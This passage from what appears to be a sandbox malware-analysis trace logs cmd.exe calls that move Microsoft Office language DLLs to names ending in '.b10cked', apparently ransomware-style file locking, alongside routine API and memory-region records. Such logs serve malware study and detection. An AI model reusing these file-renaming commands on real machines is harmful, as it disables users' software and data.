
[0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.297] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0175.297] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~2.trx")) returned 0x2020 [0175.297] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.297] SetErrorMode (uMode=0x0) returned 0x0 [0175.297] SetErrorMode (uMode=0x1) returned 0x0 [0175.297] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20ed3c, lpFilePart=0x20ed24 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", lpFilePart=0x20ed24*="WWINTL~2.TRX") returned 0x3c [0175.297] SetErrorMode (uMode=0x0) returned 0x1 [0175.297] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0175.297] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~2.trx")) returned 0x2020 [0175.298] SetErrorMode (uMode=0x0) returned 0x0 [0175.298] SetErrorMode (uMode=0x1) returned 0x0 [0175.298] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f1b8, lpFilePart=0x20ef50 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", lpFilePart=0x20ef50*="WWINTL~2.TRX") returned 0x3c [0175.298] SetErrorMode (uMode=0x0) returned 0x1 [0175.298] SetErrorMode (uMode=0x0) returned 0x0 [0175.298] SetErrorMode (uMode=0x1) returned 0x0 [0175.298] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f3c0, lpFilePart=0x20ef50 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x20ef50*="WWINTL.REST.trx_dll.b10cked") returned 0x4b [0175.298] SetErrorMode (uMode=0x0) returned 0x1 [0175.298] SetLastError (dwErrCode=0x0) [0175.298] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll.b10cked")) returned 0xffffffff [0175.298] GetLastError () returned 0x2 [0175.298] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x20e8cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e8cc) returned 0x302130 [0175.298] FindNextFileW (in: hFindFile=0x302130, lpFindFileData=0x20e8cc | out: lpFindFileData=0x20e8cc) returned 0 [0175.299] GetLastError () returned 0x12 [0175.299] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0175.300] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x301cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301cc0) returned 0x302130 [0175.300] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20eb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0175.300] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x20eb64, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0175.300] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll")) returned 0x2020 [0175.300] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0175.301] FindClose (in: hFindFile=0x302130 | out: hFindFile=0x302130) returned 1 [0175.301] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20eb18 | out: _Buffer=" 1") returned 9 [0175.301] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.301] GetFileType (hFile=0x7) returned 0x2 [0175.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0175.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eaa4 | out: lpMode=0x20eaa4) returned 1 [0175.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ead8 | out: lpConsoleScreenBufferInfo=0x20ead8) returned 1 [0175.338] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0175.338] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20eb18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0175.338] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x20eafc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eafc*=0x1a) returned 1 [0175.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.339] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.339] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.339] SetConsoleInputExeNameW () returned 0x1 [0175.339] GetConsoleOutputCP () returned 0x1b5 [0175.339] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.339] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.339] exit (_Code=0) Process: id = "312" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24079 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24081 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 24082 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24086 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24124 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24125 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24126 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24127 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 24128 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 24129 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24130 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24131 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24132 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24133 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24134 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24135 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24136 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24137 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24138 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24139 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24140 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24141 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 24142 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 24143 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 24144 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 24145 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 24146 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 24147 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000001160000" filename = "" Thread: id = 413 os_tid = 0x638 [0175.234] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f9dc | out: lpSystemTimeAsFileTime=0x28f9dc*(dwLowDateTime=0x9e58d6e0, dwHighDateTime=0x1d440a9)) [0175.234] GetCurrentProcessId () returned 0xe38 [0175.234] GetCurrentThreadId () returned 0x638 [0175.234] GetTickCount () returned 0x32efb [0175.234] QueryPerformanceCounter (in: lpPerformanceCount=0x28f9d4 | out: lpPerformanceCount=0x28f9d4*=23202340205) returned 1 [0175.235] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.235] __set_app_type (_Type=0x1) [0175.235] __p__fmode () returned 0x76b331f4 [0175.235] __p__commode () returned 0x76b331fc [0175.235] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.235] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0175.235] GetCurrentThreadId () returned 0x638 [0175.235] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x638) returned 0x38 [0175.235] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.235] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.235] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.237] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f96c | out: phkResult=0x28f96c*=0x0) returned 0x2 [0175.237] VirtualQuery (in: lpAddress=0x28f9a3, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: 
lpAddress=0x190000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.237] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f93c, dwLength=0x1c | out: lpBuffer=0x28f93c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0175.237] GetConsoleOutputCP () returned 0x1b5 [0175.237] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.238] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.238] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.238] GetEnvironmentStringsW () returned 0x470210* [0175.239] 
FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.239] GetEnvironmentStringsW () returned 0x470210* [0175.239] FreeEnvironmentStringsW (penv=0x470210) returned 1 [0175.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8dc | out: phkResult=0x28e8dc*=0x40) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0xa0, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x0, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, 
lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegCloseKey (hKey=0x40) returned 0x0 [0175.239] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8dc | out: phkResult=0x28e8dc*=0x40) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x40, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x1, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x0, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x4, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x4) returned 0x0 [0175.239] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8e4, lpData=0x28e8e8, lpcbData=0x28e8e0*=0x1000 | out: lpType=0x28e8e4*=0x0, lpData=0x28e8e8*=0x9, lpcbData=0x28e8e0*=0x1000) returned 0x2 [0175.239] 
RegCloseKey (hKey=0x40) returned 0x0 [0175.239] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.239] srand (_Seed=0x5b88638b) [0175.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" [0175.240] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.DLL.trx_dll.b10cked\"" [0175.240] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.240] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.240] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0175.240] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0175.240] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 